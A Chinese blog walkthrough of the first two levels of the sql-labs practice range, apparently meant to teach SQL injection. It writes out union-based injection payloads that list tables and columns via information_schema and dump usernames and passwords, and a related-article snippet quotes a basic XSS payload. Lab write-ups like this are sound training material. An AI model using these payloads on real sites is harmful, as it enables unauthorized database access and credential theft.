sql-labs靶场通关攻略

已于 2024-07-24 14:52:19 修改
阅读量152 收藏 3
点赞数 2
文章标签: sql 数据库 web安全 安全 mysql
于 2024-07-22 17:54:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53198216/article/details/140615817
版权

第一关

1.进入页面

2.在地址栏后输入?id=1

3.在?id=1后打一个单引号,发现页面报错判断存在sql注入

4.进行布尔判断看到判断为真显示正确,判断为假报错

5.进行order by 查询列 发现输入4的时候报错了,输入3的时候显示正确,说明共有3列

6.使用联合查询得到回显位置(id后要改成错误的值)

7.在任意回显位置输入database()查询数据库名

8.得到数据库名后使用内置表查询得到表名 

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

9.再根据表名查询得到列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

10.查询列中的敏感信息

?id=-1' union select 1,2,group_concat(username,'~',password) from users--+

第二关

1.打开第二关的页面

2.还是跟第一关一样判断是否存在sql注入

3.发现进行布尔判断的时候还是显示报错

4.我们只需要把id=1后的单引号删除即可,后面的步骤跟第一关一样

后面的慢慢更新~

weixin_53198216
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL-Labs靶场“46-50”关通关教程
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46关到50关教程,详细内容包含了:四十六关 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七关 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八关 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九关 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十关 ORDER BY数字型堆叠注等
SQL-Labs靶场“36-37”关通关教程
钟言的博客
03-19 3409
本篇为SQL-Labs靶场的36关到37关的通关教程,详细内容包含了:一、36关 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37关POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-Labs靶场“32-33”关通关教程
钟言的博客
03-14 5674
本篇为SQL-Labs靶场的第32关到33关的通关教程(宽字节注入),详细内容包含了、32关 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33关 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
sql-labs靶场
K_kiii的博客
01-26 415
将压缩包放置根目录下,找到sqil-connections并打开db-creds.inc。
SQL-Labs靶场“34-35”关通关教程
钟言的博客
03-18 2527
本篇为SQL-Labs靶场的34到35关教程,详细内容包含了:34关 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35关 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
SQL-Labs靶场“21-25”关通关教程
热门推荐
钟言的博客
02-20 1万+
本篇为SQL-Labs靶场的21关到25关通关教程,详细内容包含了、二十一关 基于base64编码单引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 、二十二关 基于base64编码双引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 二十三关 基于GET过滤注释 1、源码分析 2、updatexml报错注入 3、联合查询注入 四、二+四关 基于POST存储型二次注入 1、源码分析 2、二次注入 五、二十五关 基于GET单引号OR、A等等
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3602
sqli-labs靶场通关(1-10)
sql-labs靶场第23-53新手通关学习详解
m0_70483044的博客
11-10 1221
sql-labs 23-53新手教程~很早之前的文章忘记发了!!!有错误的地方欢迎指正!菜鸟选手。
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 5489
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
upload-labs靶场通关指南
07-02
Upload-labs靶场通关指南 Upload-labs靶场是一款文件上传漏洞靶场,旨在帮助安全研究员和渗透测试人员练习文件上传漏洞的检测和利用。本指南提供了 Upload-labs靶场通关指南,涵盖了从基础的文件上传漏洞到高级...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
PostgreSQL异常:An I/O error occurred while sending to the backend
IT后浪的博客
07-19 444
在使用PostgreSQL数据库批量写入数据的时候,遇到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
SQL Server开发新纪元:用SQL Server Data Tools (SSDT) 打造数据库
2401_85341950的博客
07-20 966
SSDT 是一个基于Visual Studio的开发工具,它集成了对SQL Server数据库项目的支持。SSDT 提供了可视化的设计界面,以及对数据库版本控制和自动化测试的支持。
SQL Server内置的HTAP技术
最新发布
2401_85789772的博客
07-22 466
假设用户建了一个行存索引和列存索引组合的表,事务插入数据时,会同时插入行存和Delta Store,Delta Store达到100W行阈值后冻结,tuple-mover后台线程会将其中较冷的数据迁移到Main Store,无论是过去的传统数仓,还是现在的大数据技术栈,都存在这个时效性问题。根据数仓场景的特点,SQL Server列存的开销其实可以接受,然后使用类Delta-Main架构也是比较主流的做法,但是到了HTAP的场景,整个数据库需要支撑高并发的查询和更新,列存的开销就会被放大。
PostgreSQL的逻辑架构
weixin_41992498的博客
07-18 191
一、PostgreSql的逻辑架构:所有者:
upload-labs靶场通关攻略:PHP文件上传漏洞利用
"upload-labs靶场通关指南" 在网络安全领域,特别是针对Web应用程序的安全测试,文件上传漏洞是一个常见的攻击点。Upload-labs靶场提供了一系列关卡,模拟了不同的文件上传防护机制,让测试者练习如何绕过这些防护...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值